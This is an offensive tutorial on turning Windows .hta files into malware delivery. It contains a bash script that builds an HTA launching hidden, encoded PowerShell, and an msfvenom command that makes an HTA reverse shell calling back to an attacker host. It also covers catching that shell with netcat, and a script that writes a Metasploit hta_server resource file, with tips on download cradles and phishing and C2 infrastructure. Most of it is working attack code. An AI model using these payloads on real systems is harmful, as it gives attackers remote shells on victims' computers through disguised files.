Windows “HTML Applications” are just HTML files (with the .hta extension) containing JavaScript or VBScript. They are interpreted by the mshta.exe binary rather than by the browser, so the script runs with full trust as the current user, outside the browser’s security zones, and can reach COM objects such as WScript.Shell; IE and Edge will both helpfully offer to run these files after they’re downloaded.

A simple example that pops a command prompt (the original string literals need quoting for JScript to parse them):

<html>
	<body>
		<script>
			// WScript.Shell is reachable because mshta runs this script with full trust.
			var command = "cmd.exe";
			new ActiveXObject("WScript.Shell").Run(command);
		</script>
	</body>
</html>
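The same mechanism is what a real payload uses: instead of cmd.exe, the HTA starts a hidden PowerShell process whose script is passed as a base64 blob via -EncodedCommand (PowerShell expects base64 over the UTF-16LE bytes of the script). The bash script below is an added example, not code from the original page or from Metasploit; it hand-builds an HTA of that shape. The HTA:APPLICATION attributes, the abbreviated PowerShell switches (-NoP -W Hidden -Ep Bypass -Enc) and the claim that this mirrors the general structure of msfvenom’s hta-psh output are assumptions of the example, not something the page states.

```bash
#!/usr/bin/env bash
# Added example: hand-build an HTA that launches a hidden PowerShell process from an
# encoded command. Not from the original page; the layout approximates hta-psh output.
set -euo pipefail

# PowerShell's -EncodedCommand takes base64 over the UTF-16LE bytes of the script,
# not over the UTF-8 text, so convert first. ASCII/UTF-8 input assumed.
ps_encode() {
  printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Emit the HTA text on stdout. $1 is the PowerShell one-liner to run hidden.
build_hta() {
  local encoded
  encoded=$(ps_encode "$1")
  cat <<EOF
<html>
<head>
  <HTA:APPLICATION ID="app" WINDOWSTATE="minimize" SHOWINTASKBAR="no" />
</head>
<body>
<script language="JScript">
  // mshta exposes WScript.Shell via ActiveX. Run(cmd, 0, false): window style 0 hides
  // the console, false returns immediately so the HTA can close itself.
  var sh = new ActiveXObject("WScript.Shell");
  sh.Run("powershell.exe -NoP -W Hidden -Ep Bypass -Enc ${encoded}", 0, false);
  window.close();
</script>
</body>
</html>
EOF
}

# Only act when given a command, so the file can also be sourced for its functions.
if [ "${1:-}" ]; then
  build_hta "$1"
fi
```

Usage: `bash make_hta.sh 'Start-Process calc' > payload.hta`. Swap the one-liner for a download cradle or a reverse-shell stager and you have, in a few lines, what the msfvenom hta-psh format produces for you automatically.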

Create malicious HTA files using Metasploit

How to exploit Windows HTML applications with msfvenom

msfvenom can be used to generate HTA reverse shells. The hta-psh output format wraps the chosen payload in a PowerShell stager that the HTA launches via WScript.Shell.

msfvenom -p windows/x64/shell_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f hta-psh -o ${NAME}.hta

Catch the callback with the standard netcat listener, nc -lvp $ATTACKER_PORT. With the payload above this is a plain command shell, not a Meterpreter session.

Metasploit can do all of this automatically for us via exploit/windows/misc/hta_server, which generates the HTA, serves it over HTTP and runs the handler for the callback. Critical variables to set:

  • LHOST — the host IP address to connect back to
  • LPORT — the port to connect back to
  • SRVHOST — the host IP address to serve the malicious file on
  • payload — the Metasploit payload to use

In quick-and-dirty cases LHOST and SRVHOST will be the same, though in more sophisticated operations (e.g., if you’re separating phishing and C2 infrastructure) they will be different. The payload variable is particularly useful, as you can use something like windows/meterpreter/reverse_tcp and get a Meterpreter session rather than just a plain reverse shell!

Note that you may have to hit “Return” once the file is served to get back to the Metasploit prompt.
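To keep the variable list above reproducible, it is worth writing it down as a Metasploit resource script rather than typing it each time. The bash script below is an added example, not code from the original page or from Metasploit: it validates the addresses and ports, then emits an .rc file for hta_server with the serving host (SRVHOST) and the callback host (LHOST) set independently. SRVPORT (the module’s HTTP serving port, 8080 by default) and the 10.10.14.x / 203.0.113.x addresses in the usage note are assumptions of the example.

```bash
#!/usr/bin/env bash
# Added example: generate a Metasploit resource script for exploit/windows/misc/hta_server
# with SRVHOST (where the .hta is served) and LHOST (where the shell calls back) set separately.
set -euo pipefail

# Accept dotted-quad IPv4 only; a typo should fail here, not become a DNS lookup at run time.
is_ipv4() {
  local ip=$1 octet
  [[ $ip =~ ^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$ ]] || return 1
  for octet in "${BASH_REMATCH[@]:1}"; do
    # 10# forces decimal so "08" is not parsed as a bad octal literal.
    (( 10#$octet <= 255 )) || return 1
  done
}

is_port() { [[ $1 =~ ^[0-9]+$ ]] && (( 10#$1 >= 1 && 10#$1 <= 65535 )); }

# hta_server_rc LHOST LPORT SRVHOST [SRVPORT] [PAYLOAD]
# SRVPORT defaults to the module's 8080; PAYLOAD defaults to a Meterpreter stager.
hta_server_rc() {
  local lhost=$1 lport=$2 srvhost=$3 srvport=${4:-8080}
  local payload=${5:-windows/meterpreter/reverse_tcp}
  is_ipv4 "$lhost"   || { echo "LHOST must be an IPv4 address: $lhost" >&2; return 1; }
  is_ipv4 "$srvhost" || { echo "SRVHOST must be an IPv4 address: $srvhost" >&2; return 1; }
  is_port "$lport"   || { echo "bad LPORT: $lport" >&2; return 1; }
  is_port "$srvport" || { echo "bad SRVPORT: $srvport" >&2; return 1; }
  cat <<EOF
use exploit/windows/misc/hta_server
set payload $payload
set LHOST $lhost
set LPORT $lport
set SRVHOST $srvhost
set SRVPORT $srvport
run -j
EOF
}

# Only act when called with arguments, so the file can also be sourced for its functions.
if (( $# >= 3 )); then
  hta_server_rc "$@"
fi
```

Usage: `bash hta_rc.sh 10.10.14.7 4444 203.0.113.10 80 > hta_server.rc && msfconsole -q -r hta_server.rc`. Because `run -j` backgrounds the module, the console prompt returns straight away and the module prints the URL to hand to the target; this is also why you sometimes need to press Return to get the prompt back after the file has been served.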
